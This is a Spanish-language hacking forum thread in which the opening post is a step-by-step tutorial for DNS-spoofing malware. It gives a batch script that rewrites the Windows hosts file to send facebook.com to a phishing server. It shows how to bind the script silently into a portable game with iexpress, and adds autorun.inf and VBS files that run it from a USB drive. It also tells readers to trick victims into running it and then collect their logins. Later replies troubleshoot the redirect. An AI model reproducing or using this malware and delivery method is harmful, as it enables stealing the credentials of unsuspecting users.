comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Dns Spoof Modificando Archivo hosts con "Malware"

  • 7 Respuestas
  • 4864 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Agosto 07, 2012, 03:01:11 am »
DNS Spoofing Malware

Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro

Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

En mi caso direccionare facebook.com a un sitio Fake (Phishing)
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit
Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.



Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:



aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat



En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)



Ahora ejecutamos para la prueba:



vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.



borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[autorun]

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs
y un Start.vbs que contenga:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide
Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive



Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a No tienes permisos para ver links. Registrate o Entra con tu cuenta (que realmente es un sitio Phishing)
Agregamos de Informacion User: pepe@hotmail.com pass: Owned



y le damos Entrar, nos redirecciona a No tienes permisos para ver links. Registrate o Entra con tu cuenta (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt



Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker
« Última modificación: Agosto 08, 2014, 09:25:10 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #1 en: Agosto 07, 2012, 05:35:13 am »
Muy bueno "hdbreaker" había mucha gente que preguntaba sobre DNS Spoofing, espero que esto les sirva porque esta muy bien explicado ;)



Saludos

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Agosto 07, 2012, 12:33:54 pm »
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->
« Última modificación: Agosto 07, 2012, 01:52:14 pm por zoro248 »

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #3 en: Agosto 07, 2012, 09:14:27 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->
Tal ves tu problema radique en esta linea del .bat

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts

el IP debe ser de un Servidor Privado Propio, o uno personal montado con un IP Estatica, si no cuentas con esto, prueba redireccionar a una IP LOCAL

q el archivo localhost quede:

127.0.0.1 No tienes permisos para ver links. Registrate o Entra con tu cuenta

esto lograra q al visitar No tienes permisos para ver links. Registrate o Entra con tu cuenta se redireccione a 127.0.0.1

sino otra prueba q puedes hacer es cambiar No tienes permisos para ver links. Registrate o Entra con tu cuenta por el ip de facebook.com

hosts:

66.220.149.11 No tienes permisos para ver links. Registrate o Entra con tu cuenta

al visitar No tienes permisos para ver links. Registrate o Entra con tu cuenta seras redireccionado a facebook

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Agosto 07, 2012, 10:30:10 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->
Tal ves tu problema radique en esta linea del .bat

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts

el IP debe ser de un Servidor Privado Propio, o uno personal montado con un IP Estatica, si no cuentas con esto, prueba redireccionar a una IP LOCAL

q el archivo localhost quede:

127.0.0.1 No tienes permisos para ver links. Registrate o Entra con tu cuenta

esto lograra q al visitar No tienes permisos para ver links. Registrate o Entra con tu cuenta se redireccione a 127.0.0.1

sino otra prueba q puedes hacer es cambiar No tienes permisos para ver links. Registrate o Entra con tu cuenta por el ip de facebook.com

hosts:

66.220.149.11 No tienes permisos para ver links. Registrate o Entra con tu cuenta

al visitar No tienes permisos para ver links. Registrate o Entra con tu cuenta seras redireccionado a facebook

Muchas gracias por la respuesta, seguire checando, te aviso que tal


...Saludos --->

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Agosto 12, 2012, 09:43:36 pm »
Sigue sin funcionar, hizo el ejemplo que dijiste con ip local, pero ni asi funciona, ya lo probe con win 7 y tampoco..


..Saludos espero tu respuesta --->

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #6 en: Agosto 13, 2012, 02:18:37 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Sigue sin funcionar, hizo el ejemplo que dijiste con ip local, pero ni asi funciona, ya lo probe con win 7 y tampoco..


..Saludos espero tu respuesta --->

Fijate luego de modificar el archivo host, en reiniciar la pc y matar el proceso explorer.exe y volverlo a ejecutar

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado s00rk

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Agosto 13, 2012, 02:40:28 am »
No entiendo porque matar el explorer.exe o.O! nunca lo he tenid que hacer a la hora de modificar el archivo Host, aun usando Win XP o Win7 me ha funcionado sin matar algo hehe, sobre el error de zoro quiero creer que tienes un servidor web en tu PC, asi como tambien si usas un router las PC que esten conectadas a ese router en la IP debe ser la lan tuya, en cambio si quieres hacerlo a una PC fuera deberas usar tu IP publica o usar no-ip(esto la verdad nose si funciona ya que nunca lo he usado hehe)

 

¿Te gustó el post? COMPARTILO!



Acceder a plataformas de Cuckoo Sandbox plataformas de analisis de Malware

Iniciado por Rootkit_Pentester

Respuestas: 1
Vistas: 905
Último mensaje Enero 24, 2018, 07:14:19 pm
por ronluas
Propagación de Malware en Android a través de Whatsapp

Iniciado por rollth

Respuestas: 5
Vistas: 4428
Último mensaje Febrero 02, 2018, 02:12:37 pm
por Nobody
[Manual] Cambiar extensió de cualquier archivo - Ocultación de ejecutables

Iniciado por LucaSthefano

Respuestas: 4
Vistas: 2405
Último mensaje Julio 25, 2011, 04:30:35 am
por LucaSthefano
MALWARE en android

Iniciado por Massacrer22

Respuestas: 1
Vistas: 1796
Último mensaje Julio 10, 2017, 07:36:40 pm
por DarkXploitz
Incorporación de un payload en un archivo RAR / ZIP/JPG/PNG/etc...

Iniciado por LionSec

Respuestas: 4
Vistas: 1983
Último mensaje Noviembre 23, 2014, 01:31:56 pm
por LionSec